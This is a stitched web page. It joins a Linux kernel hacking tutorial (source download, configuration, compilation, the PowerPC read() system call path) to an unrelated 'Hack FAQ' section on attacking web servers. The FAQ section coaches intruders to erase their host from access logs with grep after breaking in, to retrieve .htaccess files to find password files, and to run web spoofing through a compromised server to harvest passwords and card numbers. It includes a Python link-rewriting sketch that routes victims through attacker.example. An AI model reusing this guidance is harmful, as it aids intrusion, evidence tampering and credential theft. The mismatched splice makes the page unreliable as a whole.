     Usually there is a file named LATEST-IS-<version> to tell you what the latest version is. I recommend the gzipped format (filename ending in .gz) instead of bzip2 format (filename ending in .bz2) since bzip2 takes a long time to decompress.
    Untar and uncompress the file in the directory where you are planning to work.
    You now have your Linux kernel source.
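The untar-and-uncompress step above is a single tar command. Here is a sketch you can try anywhere; it fabricates a tiny stand-in tarball first, since the real linux-2.6.9.tar.gz is assumed to be whatever you just downloaded:

```shell
# Work in a scratch directory (the real thing would be your source dir).
demo_dir=$(mktemp -d)
cd "$demo_dir"

# Fabricate a stand-in for the downloaded tarball -- demo only.
mkdir linux-2.6.9
touch linux-2.6.9/Makefile
tar czf linux-2.6.9.tar.gz linux-2.6.9
rm -r linux-2.6.9

# The actual step: uncompress and untar in one go.
tar xzf linux-2.6.9.tar.gz

ls linux-2.6.9    # the unpacked source tree
```

With a real kernel tarball you would only run the final tar xzf line, in the directory where you plan to work.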
    1. Install the kernel source from your distribution CD. If you already have a directory named /usr/src/linux and it contains more than one directory, you already have the source installed. If you don't, read on.
  10. Mount your installation CDROM. On a RedHat based system, the source RPM is usually in <DistributionName>/RPMS/ and is named:
    kernel-source-<version>.<arch>.rpm
    One way to find the kernel source package is to run this command, assuming your CD is mounted at /mnt/cdrom:
    $ find /mnt/cdrom -name \*kernel-\*
    Install the RPM using:
    $ rpm -iv <pathname>/kernel-source-<version>.<arch>.rpm
     The -v switch will tell you whether it fails or not.
    If your system is not RPM-based, please let us know how to install the kernel source from your distribution CD.
    • There are various other ways to get the kernel source, involving CVS or rsync. If you would like to write instructions for one of these other methods of getting the kernel source, go ahead and we'll include them here.
    Why do I recommend BitKeeper over ftp, and ftp over vendor source? BitKeeper handles creating patches for you. (A patch contains the differences between one source tree and another source tree.) BitKeeper also applies the latest changes for you. When I want to update my tree, I just type:
    $ bk pull
    
    And most of the time, it just works. The only time I have to do work is if I have written code that conflicts with the new code downloaded from the parent tree. When I want to make a patch to send to somebody, I just type:
    $ bk citool
       $ bk -hr<latest revision number> | bk gnupatch > newpatch
    
    When I want to undo my latest changes, I type:
    $ bk undo -r<latest revision number>
    
     BitKeeper has all kinds of pretty GUI tools to make debugging and merging code easier. I like BitKeeper so much I wrote a paper about it. You can find the paper and some slides on my web page: http://www.nmt.edu/~val

     I prefer the vanilla kernel source from ftp.kernel.org over the vendor source because you never know what changes the vendor has made to the source. Most of the time, the vendor has improved the tree, but often they make changes of dubious value to a kernel hacker. For example, RedHat 6.2 shipped a kernel that compiled differently depending on whether you were running an SMP kernel at the time of compilation. This makes sense if you are just recompiling a kernel for that machine, but it was useless if you were trying to compile a kernel for a different machine. The other reason to use vanilla source instead of vendor source is if you want to create and send patches to other kernel developers. If you create a patch and send it to the Linux kernel mailing list for inclusion in the main kernel tree, it had better be against the latest vanilla source tree. If you create a patch on a vendor source tree, it's unlikely to apply to a vanilla source tree.

     The one place where vendor source is crucial is for non-x86 architectures. The vanilla source almost never builds and boots on an architecture other than x86. Often, the best place to get a working kernel for a non-x86 is the vendor source. Each architecture usually has some quirky way of getting the latest source in addition to the vendor-supplied source.
  11. Configure Your Kernel
    The Linux kernel comes with several configuration tools. Each one is run by typing make <something>config in the top-level kernel source directory. (All make commands need to be run from the top-level kernel directory.)
    1. make config

    2. This is the barebones configuration tool. It will ask each and every configuration question in order. The Linux kernel has a LOT of configuration questions. Don't use it unless you are a masochist. Most people use make menuconfig (a text-mode menu interface) or make xconfig (a graphical one) instead; both are mentioned below.
    Each of the configuration programs produces these end products:
    1. A file named .config in the top-level directory containing all your configuration choices.
     If you have a working .config file for your machine, just copy it into your kernel source directory and run make oldconfig. You should double check the configuration with make menuconfig. If you don't already have a .config file, you can create one by visiting each submenu and turning on or off the options you need. menuconfig and xconfig have a "Help" option that shows you the Configure.help entry for that option, which may help you decide whether or not it should be turned on. RedHat and other distributions often include sample .config files with their distribution specific kernel source, in a subdirectory named configs in the top-level source directory. If you are compiling for PowerPC, you have a variety of default configs to choose from in arch/ppc/configs; make defconfig will copy the default ppc config file to .config. If you know another source of default configuration files, let us know.
    Tips for configuring a kernel:
    1. Always turn on "Prompt for development... drivers".
    2. From kernel 2.6.8, you can add your own string (such as your initials) at "Local version - append to kernel release" to personalize your kernel version string (for older kernel versions, you have to edit the EXTRAVERSION line in the Makefile).
    3. Always turn off module versioning, but always turn on kernel module loader, kernel modules and module unloading.
    4. In the kernel hacking section, turn on all options except for "Use 4Kb for kernel stacks instead of 8Kb". If you have a slow machine, don't turn on "Debug memory allocations" either.
    5. Turn off features you don't need.
    6. Only use modules if you have a good reason to use a module. For example, if you are working on a driver, you'll want to load a new version of it without rebooting.
    7. Be extra sure you selected the right processor type. Find out what processor you have now with cat /proc/cpuinfo.
    8. Find out what PCI devices you have installed with lspci -v.
    9. Find out what your current kernel has compiled in with dmesg | less. Most device drivers print out messages when they detect a device.
    If all else fails, copy a .config file from someone else.
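One common way to get a starting .config is to reuse the config of the kernel you are running now. Most distributions install it under /boot; that path is an assumption about your distribution, and this sketch only prints the suggested next steps rather than touching a source tree:

```shell
# Look for the running kernel's saved config (distro-dependent location).
cfg="/boot/config-$(uname -r)"
if [ -f "$cfg" ]; then
    echo "found: $cfg"
    echo "next: cp $cfg .config && make oldconfig && make menuconfig"
    found=yes
else
    echo "no saved config under /boot; start from make defconfig instead"
    found=no
fi
```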
  12. Compile Your Kernel
    At this point, you have your kernel source, and you've run one of the configuration programs and (very important) saved your new configuration file. Don't laugh - I've done this many times.
    First, build the kernel:
    On an x86:
    # make -j<number of jobs> bzImage
    On a PPC:
    # make -j<number of jobs> zImage
    Where <number of jobs> is two times the number of cpus in your system. So if you have a single cpu Pentium III, you'd do:
    # make -j2 bzImage
     What the -j argument tells the make program is to run that many jobs (commands in the Makefile) at once. make knows which jobs can be run at the same time and which jobs need to wait for other jobs to finish before they can run. Kernel compilation jobs spend enough time waiting for I/O (for example, reading the source file from disk) that running two of the jobs per processor results in the shortest compilation time. NOTE: If you get a compile error, run make with only one job so that it's easy to see where the error occurred. Otherwise, the error message will be hidden in the output from the other make jobs.
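The "two jobs per CPU" rule can be computed rather than hard-coded. getconf is one portable way to count CPUs (nproc works too on modern systems); this sketch just prints the make command it would run:

```shell
cpus=$(getconf _NPROCESSORS_ONLN)   # number of online CPUs
jobs=$(( cpus * 2 ))                # two make jobs per CPU, per the rule above
echo "make -j${jobs} bzImage"
```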
    If you have enabled modules, you'll need to compile them with the command:
    # make modules
    If you are planning on loading these modules on the same machine they are compiled on, then run the automatic module install command. But FIRST - save your old modules!
     # mv /lib/modules/`uname -r` /lib/modules/`uname -r`.bak
       # make modules_install
     This will put all the modules in subdirectories of the /lib/modules/<version> directory. You can find out what <version> is by looking in include/linux/version.h.

    Recompiling the kernel

    So, now you've compiled the kernel once. Now you want to change part of the kernel and recompile it. What do you need to do?
    In most cases, simply running make -j2 bzImage (or whatever your kernel compile command is) again will do the trick. If you've altered a module's source file, then just do make modules and make modules_install (if appropriate).
     Sometimes, you'll change things so much that make can't figure out how to recompile the files correctly. make clean will remove all the object and kernel object files (ending in .o and .ko) and a few other things. make mrproper will do everything make clean does, plus remove your config file, the dependency files, and everything else that make config creates. Be sure to save your config file in another file before running make mrproper. Afterwards, copy the config file back to .config and start over, beginning at make menuconfig. A make mrproper will often fix strange kernel crashes and strange compilation errors that make no sense.
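The save-your-config dance around make mrproper looks like the sketch below. It runs in a scratch directory with a stand-in .config (and an rm standing in for what mrproper does) so nothing real gets wiped:

```shell
work=$(mktemp -d)
cd "$work"
echo "CONFIG_DEMO=y" > .config   # stand-in for your real .config

backup=$(mktemp)                 # 1. save the config somewhere safe
cp .config "$backup"

rm -f .config                    # 2. stand-in for what 'make mrproper' does

cp "$backup" .config             # 3. restore it, then re-run make oldconfig
grep CONFIG_DEMO .config         # the config survived
```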
     Here are some tips for recompilation when you are working on just one or two files. Say you are changing the file drivers/char/foo.c and you are having trouble getting it to compile at all. You can just type (from the drivers/char/ directory) make -C path/to/kernel/src SUBDIRS=$PWD modules and make will immediately attempt to compile the modules in that directory, instead of descending through all the subdirectories in order and looking for files that need recompilation. If drivers/char/foo.c is a module, you can then insmod the drivers/char/foo.ko file when it actually does compile, without going through the full-blown make modules command. If drivers/char/foo.c is not a module, you'll then have to run make -j2 bzImage to link it with all the other parts of the kernel.
    The && construct in bash is very useful for kernel compilation. The bash command line:
    # thing1 && thing2
    Says, "Do thing1, and if it doesn't return an error, do thing2." This is useful for doing something only if a compile command succeeds.
    When I'm working on a module, I often use the following command:
    # rmmod foo.ko && make -C path/to/kernel/src SUBDIRS=$PWD modules \
         && insmod foo.ko
    This says, "Remove the module foo.ko, and if that succeeds, compile the modules in drivers/char/, and if that succeeds, load the kernel module object file." That way, if I get a compile error, it doesn't load the old module file and it's obvious that I need to fix my code.
    Don't let yourself get too frustrated! If you just can't figure out what's going on, try the make mrproper command. If you still can't figure it out, post your question on grrls-only. It's good to try to figure things out by yourself, but it's not good if it makes you give up trying at all.
  13. Understanding System Calls
     By now, you're probably looking around at device driver code and wondering, "How does the function foo_read() get called?" Or perhaps you're wondering, "When I type cat /proc/cpuinfo, how does the cpuinfo() function get called?"
    Once the kernel has finished booting, the control flow changes from a comparatively straightforward "Which function is called next?" to being dependent on system calls, exceptions, and interrupts. Today, we'll talk about system calls.

    What is a system call?

    In the most literal sense, a system call (also called a "syscall") is an instruction, similar to the "add" instruction or the "jump" instruction. At a higher level, a system call is the way a user level program asks the operating system to do something for it. If you're writing a program, and you need to read from a file, you use a system call to ask the operating system to read the file for you.

    System calls in detail

    Here's how a system call works. First, the user program sets up the arguments for the system call. One of the arguments is the system call number (more on that later). Note that all this is done automatically by library functions unless you are writing in assembly. After the arguments are all set up, the program executes the "system call" instruction. This instruction causes an exception: an event that causes the processor to jump to a new address and start executing the code there.
     The instructions at the new address save your user program's state, figure out which system call you want, call the function in the kernel that implements that system call, restore your user program's state, and return control back to the user program. A system call is one way that the functions defined in a device driver end up being called.
    That was the whirlwind tour of how a system call works. Next, we'll go into minute detail for those who are curious about exactly how the kernel does all this. Don't worry if you don't quite understand all of the details - just remember that this is one way that a function in the kernel can end up being called, and that no magic is involved. You can trace the control flow all the way through the kernel - with difficulty sometimes, but you can do it.
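You can also watch system calls happen from userspace with strace, which prints each syscall a process makes; it is a handy sanity check alongside reading the kernel source. strace is assumed to be installed, so this sketch falls back to a note if it is not:

```shell
if command -v strace >/dev/null 2>&1; then
    log=$(mktemp)
    # Log every read() that cat makes while reading /proc/cpuinfo.
    strace -e trace=read -o "$log" cat /proc/cpuinfo >/dev/null 2>&1
    head -n 3 "$log"    # lines like: read(3, "processor\t: 0"..., 4096) = ...
    result=traced
else
    echo "strace not installed; skipping"
    result=skipped
fi
```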

    A system call example

    This is a good place to start showing code to go along with the theory. We'll follow the progress of a read() system call, starting from the moment the system call instruction is executed. The PowerPC architecture will be used as an example for the architecture specific part of the code. On the PowerPC, when you execute a system call, the processor jumps to the address 0xc00. The code at that location is defined in the file:
    arch/ppc/kernel/head.S
    It looks something like this:
    /* System call */
            . = 0xc00
    SystemCall:
            EXCEPTION_PROLOG
            EXC_XFER_EE_LITE(0xc00, DoSyscall)
    
    /* Single step - not used on 601 */
            EXCEPTION(0xd00, SingleStep, SingleStepException, EXC_XFER_STD)
            EXCEPTION(0xe00, Trap_0e, UnknownException, EXC_XFER_EE)
    
     What this code does is save some state and call another function called DoSyscall. Here's a more detailed explanation (feel free to skip this part):
     EXCEPTION_PROLOG is a macro that handles the switch from user to kernel space, which requires things like saving the register state of the user process. EXC_XFER_EE_LITE is called with the address of this routine and the address of the function DoSyscall. Eventually, some state will be saved and DoSyscall will be called. The next two lines install two exception vectors at the addresses 0xd00 and 0xe00.
    EXC_XFER_EE_LITE looks like this:
    #define EXC_XFER_EE_LITE(n, hdlr)       \
            EXC_XFER_TEMPLATE(n, hdlr, n+1, COPY_EE, transfer_to_handler, \
                              ret_from_except)
    
    EXC_XFER_TEMPLATE is another macro, and the code looks like this:
    #define EXC_XFER_TEMPLATE(n, hdlr, trap, copyee, tfer, ret)     \
            li      r10,trap;                                       \
            stw     r10,TRAP(r11);                                  \
            li      r10,MSR_KERNEL;                                 \
            copyee(r10, r9);                                        \
            bl      tfer;                                           \
    i##n:                                                           \
            .long   hdlr;                                           \
            .long   ret
    
     li stands for "load immediate", which means that a constant value known at compile time is stored in a register. First, trap is loaded into the register r10. On the next line, that value is stored at the address given by TRAP(r11). TRAP(r11) and the next two lines do some hardware specific bit manipulation. After that we call the tfer function (i.e. the transfer_to_handler function), which does yet more housekeeping, and then transfers control to hdlr (i.e. DoSyscall). Note that transfer_to_handler loads the address of the handler from the link register, which is why you see .long DoSyscall instead of bl DoSyscall.
    Now, let's look at DoSyscall. It's in the file:
    arch/ppc/kernel/entry.S
    Eventually, this function loads up the address of the syscall table and indexes into it using the system call number. The syscall table is what the OS uses to translate from a system call number to a particular system call. The system call table is named sys_call_table and defined in:
    arch/ppc/kernel/misc.S
     The syscall table contains the addresses of the functions that implement each system call. For example, the read() system call function is named sys_read. The read() system call number is 3, so the address of sys_read() is in the 4th entry of the system call table (since we start numbering the system calls with 0). We read the data from the address sys_call_table + (3 * word_size) and we get the address of sys_read().
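The table lookup is plain pointer arithmetic. Assuming read()'s syscall number of 3 and a 4-byte table entry (a 32-bit machine), the offset works out as:

```shell
syscall_num=3   # read() is system call number 3
word_size=4     # bytes per table entry on a 32-bit machine (assumed)
offset=$(( syscall_num * word_size ))
echo "sys_read() lives at sys_call_table + ${offset} bytes (the 4th entry)"
```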
    After DoSyscall has looked up the correct system call address, it transfers control to that system call. Let's look at where sys_read() is defined, in the file:
    fs/read_write.c
     This function finds the file struct associated with the fd number you passed to the read() function. That structure contains a pointer to the function that should be used to read data from that particular kind of file. After doing some checks, it calls that file-specific read function in order to actually read the data from the file, and then returns. This file-specific function is defined somewhere else - the socket code, filesystem code, or device driver code, for example. This is one of the points at which a specific kernel subsystem finally interfaces with the rest of the kernel. After our read function finishes, we return from sys_read() back to DoSyscall(), which switches control to ret_from_except, which is defined in:
    arch/ppc/kernel/entry.S
     This checks for tasks that might need to be done before switching back to user mode. If nothing else needs to be done, we fall through to the restore function, which restores the user process's state and returns control back to the user program. There! Your read() call is done! If you're lucky, you even got your data back.
     You can explore syscalls further by putting printks at strategic places. Be sure to limit the amount of output from these printks. For example, if you add a printk to the sys_read() syscall, you should do something like this:
     static int mycount = 0;

     if (mycount < 10) {
             printk ("sys_read called\n");
             mycount++;
     }
    
    Have fun!

The Hack FAQ

10.0 The Basic Web Server
This section touches on other platforms here and there, but it mainly refers to Unix-based Web servers.

10.1 What are the big weak spots on servers?

The big weak spots are as follows:
- The server running HTTPD as root. This means that any time a user attaches to the web server, they are talking to a process running as root. Very powerful if there are any holes at all: if your browser can find a way in, you can gain access to anything on the system.
- Improper checking and buffering of user data by CGI scripts. Either a buffer can be overrun or arbitrary commands can be sent to the server.
- Improper configuration of the server itself or the web server, allowing access to files not intended for the general public. This could include log files, the htpasswd file, and web server configuration files. But the main problem is a CGI interpreter (perl.exe on an NT web server leaps to mind) that allows a browser to execute server commands, launch shells, rename or append to files, etc.

10.2 What are the critical files?

They are as follows (the names may vary depending on the httpd server you're running):
httpd.conf
Contains all of the info to configure the httpd service.
srm.conf
Contains the info as to where scripts and documents reside.
access.conf
Defines the service features for all browsers.
.htaccess
Limits access on a directory-by-directory basis.

10.3 What's the difference between httpd running as a daemon vs. running under inetd?

Performance. If httpd is running as a standalone daemon, it reads its configuration files once and responds faster to user requests. Typically, if a site is expecting many users, the server is dedicated. This can be as simple as starting httpd as follows:
# httpd &
Of course, the site will probably have something like this in the /etc/rc0 (or equivalent file) so that httpd starts on bootup:
if [ -x /path/to/httpd ]; then
        /path/to/httpd
fi
Most sites with web servers accessible to the Internet run as a standalone daemon. The downside is if the web service isn't being used all of the time then the server is wasting CPU running a web service with no one accessing it.
Running httpd under inetd starts and stops as user requests come in. The performance isn't as good -- as the server spawns httpd for each user, the configuration files are read in for each request. It is usually run by having a line in /etc/services like this:
http 80/tcp
There is an entry like this in /etc/inetd.conf:
http stream tcp nowait nobody /path/to/httpd httpd
This type of setup is most common on intranets. Very few Internet servers are set up this way, unless they are simply not very busy or the site is simply trying to save resources, combining web, ftp, and a few other services on one box.

10.4 How does the server resolve paths?

Typically, a server will resolve paths by having a point in the configuration files that says something like "turn ~ into public_html", which means that ~thegnome will resolve to /server/path/to/documents + public_html. Therefore, if your server's path to docs is /usr/local/etc/httpd/htdocs with a subdirectory under that of public_html and all of the users' directories under THAT, http://www.example.com/pub/public_html/thegnome becomes http://www.example.com/~thegnome and accesses the same file.
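The resolution described above is just string substitution. A sketch using the paths from the example; this layout is the hypothetical one in the text, not a universal default:

```shell
docroot=/usr/local/etc/httpd/htdocs   # server's path to docs (from the example)
userdir=public_html                   # what "~" is turned into
user=thegnome                         # the "~thegnome" part of the URL

resolved="${docroot}/${userdir}/${user}"
echo "http://www.example.com/~${user} -> ${resolved}"
```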
The problem with resolves is that some sites (depending on software, revisions, os, patches, etc) will resolve based off of the /etc/passwd listing of the home directory. This is good for intrusion, bad for security. As stated earlier in the FAQ, accessing http://www.example.com/~bin/etc/ can yield interesting results. In practical experience, we've seen this more often on BSD derivatives with Apache than anything else.

10.5 What log files are used by the server?

This entirely depends on the server software and how it is configured. It is usually in a subdirectory called "logs" in a different section of the tree than the regular web pages. It is usually named "access_log" for Apache or NCSA, or "access" for Netscape, or some other easily self-identifying name. This log will contain entries like so:
thegnome.example.com - - [14/Dec/1996:00:13:31 -0600] "GET /nomad/ HTTP/1.0" 200 293
thegnome.example.com - - [14/Dec/1996:00:13:35 -0600] "GET /nomad/2.html HTTP/1.0" 200 303
thegnome.example.com - - [14/Dec/1996:00:13:39 -0600] "GET /nomad/3.html HTTP/1.0" 200 333
thegnome.example.com - - [14/Dec/1996:00:13:43 -0600] "GET /nomad/4.html HTTP/1.0" 200 359
thegnome.example.com - - [14/Dec/1996:00:13:47 -0600] "GET /nomad/5.html HTTP/1.0" 200 385
thegnome.example.com - - [14/Dec/1996:00:13:51 -0600] "GET /nomad/6.html HTTP/1.0" 200 434
thegnome.example.com - - [14/Dec/1996:00:13:55 -0600] "GET /nomad/nomad.html HTTP/1.0" 200 1988
thegnome.example.com - - [14/Dec/1996:00:14:02 -0600] "GET /nomad/unix/index.html HTTP/1.0" 200 5066
thegnome.example.com - - [14/Dec/1996:00:14:28 -0600] "GET /nomad/unix/cvnmount.exploit HTTP/1.0" 200 3117
Obviously, if your phf accesses are in there, it could be incriminating. If you gain access, you might want to eliminate yourself from them.
  1. mv access_log access_tmp
  2. grep -v thegnome.example.com access_tmp > access_log
  3. rm access_tmp
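The three steps above, demonstrated on a fabricated two-line access_log in a scratch directory so the effect is visible (grep -v keeps every line that does NOT match):

```shell
logdir=$(mktemp -d)
cd "$logdir"

# A fabricated log: one matching entry, one non-matching one.
printf '%s\n' \
  'thegnome.example.com - - "GET /nomad/ HTTP/1.0" 200 293' \
  'other.example.com - - "GET /index.html HTTP/1.0" 200 100' > access_log

mv access_log access_tmp
grep -v thegnome.example.com access_tmp > access_log   # drop matching lines
rm access_tmp

cat access_log    # only the non-matching entry remains
```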
The same goes for the error log. Called error_log or error, its entries look like this:
[Thu Dec 19 22:10:02 1996] access to /usr/local/etc/httpd/htdocs/nomad/faqs/netware.htm failed for dyn2121a.dialin.example.com, reason: File does not exist
[Thu Dec 19 22:10:21 1996] access to /usr/local/etc/httpd/htdocs/nomad/faqs/_free.html_ failed for dyn2121a.dialin.example.com, reason: File does not exist
[Thu Dec 19 23:29:35 1996] access to /usr/local/etc/httpd/htdocs/nomad/HTTP failed for niobe.example.com, reason: File does not exist
[Thu Dec 19 23:48:19 1996] send script output lost connection to client ip189.raleigh3.nc.example.com
[Thu Dec 19 23:48:25 1996] send script output lost connection to client 10.0.1.1
[Fri Dec 20 09:19:13 1996] accept: Connection reset by peer
[Fri Dec 20 09:19:13 1996] - socket error: accept failed
[Fri Dec 20 10:35:41 1996] accept: Connection reset by peer
[Fri Dec 20 10:35:41 1996] - socket error: accept failed
[Fri Dec 20 10:39:55 1996] access to /usr/local/etc/httpd/htdocs/nomad/unix/Xtx86.c failed for 192.168.1.1, reason: File does not exist

10.6 How do access restrictions work?

This is going to vary from platform to platform, but we're going to use NCSA as an example. We're not going into a lot of detail, the point is that service can be limited, and to give a flavor of how easy it is for an admin to set up.
Restricting Access by Host Name:
In NCSA this is in access.conf, and you can specify the following:
allow
host names allowed
AllowOveride
determines whether per-directory access overrides global access restrictions
deny
host names denied
There are more options depending on OS, server software, etc., and you can get pretty detailed. But most server software allows access restriction by host names.
Restricting Access by Directory:
This is usually accomplished by specifying a <Directory /real/path/to/directory> tag with the restrictions following, and then closing with an ending tag of </Directory>, all within the access.conf file. For example, let's say the admin wants to limit a directory to company employees only on an NCSA server:
<Limit GET>
        order deny,allow
        deny from all
        allow from mydomain.org
</Limit>
Include those lines in a .htaccess file in the directory you wish to limit and bingo, you're limiting access.

10.7 How do password restrictions work?

This typically involves the admin performing the following functions:
Building each user id/password as needed. Updating the main configuration files to recognize that passwords are being used. Updating any .htaccess files in individual directories.
The command line syntax for creating a user ID and password (on NCSA) is:
htpasswd [-c] .htpasswd UserName
Here .htpasswd is the password file and UserName is the user you wish to create or edit. The -c option specifies that a new file be created rather than an existing one edited. You will be prompted to type the password in twice; if UserName already exists in the file, its password is simply replaced. These passwords do not correspond to system passwords, so if you are an idiot wannabe hacker and you just got into a server with a shell, don't expect to create a root account with htpasswd and then su to it.
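For reference, the resulting .htpasswd file is just one user:hash line per user, with the password stored as a crypt() hash rather than in the clear. The entries below are made up for illustration:

```
# contents of .htpasswd -- user names and hashes are illustrative only
webmaster:iTkXgCSHRlV1E
jdoe:aX1tPkMnLqW2c
```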
In NCSA, you will find the following in the access.conf file indicating passwords are in use:
<Directory /usr/stuff/WWW/docs>
        AllowOverride None
        Options Indexes
        AuthName secretPassword
        AuthType Basic
        AuthUserFile /usr/WWW/security/.htpasswd
        AuthGroupFile /usr/WWW/security/NULL
        <Limit GET>
                require user UserName
        </Limit>
</Directory>
For a directory-level usage, this might be in the .htaccess file:
AuthName secretPassword
AuthType Basic
AuthUserFile /usr/WWW/security/.htpasswd
AuthGroupFile /usr/WWW/security/.group1
<Limit GET>
        require user UserName
</Limit>
Once again, we're not going to go into a lot of detail here. You need to read the documentation for the server you're attacking (i.e. do your homework) and THEN start changing or updating files. For example, .htaccess is the name of the file for NCSA and its derivatives.
One of the good things for intruders is that if an admin is using per-directory restrictions you can often retrieve these files just like a regular URL. For example, if the target is restricting access to the /usr/local/etc/httpd/docs/secure directory using a .htaccess file to control access, this URL might retrieve it (depending on server software):
http://www.example.com/secure/.htaccess
Besides containing important info, it will give you the location of the web passwd file.

10.8 What is web spoofing?

Summed up, web spoofing is a man-in-the-middle attack that makes the user think they have a secured session with one specific web server, when in fact they have a secured session with an attacker's server. At that point, the attacker could persuade the user to supply credit card or other personal info, passwords, etc. You get the idea.
Here's how it works in a nutshell:
  • The attacker has set up an intercept for XYZ Company's web site, using DNS spoofing or some other means, such as getting their own look-alike site listed in a search engine.
  • The user wants to visit XYZ Company's web site and clicks on a link.
  • The attacker has built their own SSL certificate, and the domain in this certificate looks authentic to the user's browser.
  • The user gets the solid key and now assumes all is safe and will be encrypted and secure.
  • The attacker's forms on this trojan site may include fields for passwords, credit cards, bank accounts, etc. and the unknowing user provides this info to the attacker as they use the forms.
What is the problem here? It is not SSL. It is the certificates. You see, as long as you have what looks to be the proper info in the certificate, the user will never know the difference. Sure, the URL might not look right, but you can use Java to control that.
Of course, only an idiot would redirect a user to a server in their home or office; you would instead redirect them to a server you have compromised, and use that compromised server's certificate to get the solid key. That's the trick -- make the key solid, and the user is fooled.
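The interception step above is usually implemented by rewriting every link in the pages the victim fetches, so that each subsequent click also routes through the attacker's machine. Here is a minimal sketch in Python (the host names and function are hypothetical; a real attack also uses client-side script to hide the bogus URL in the browser's location bar):

```python
# Sketch of the link-rewriting step in a web spoofing proxy.
# All names below are hypothetical.
ATTACKER = "http://www.attacker.example"

def rewrite_links(page_html):
    # Prefix every absolute link so the victim's next click
    # also passes through the attacker's server.
    return page_html.replace('href="http://', 'href="%s/http://' % ATTACKER)

page = '<a href="http://www.xyz.example/login">Log in</a>'
print(rewrite_links(page))
# -> <a href="http://www.attacker.example/http://www.xyz.example/login">Log in</a>
```

The victim's browser never talks to www.xyz.example directly; everything, forms included, flows through the attacker.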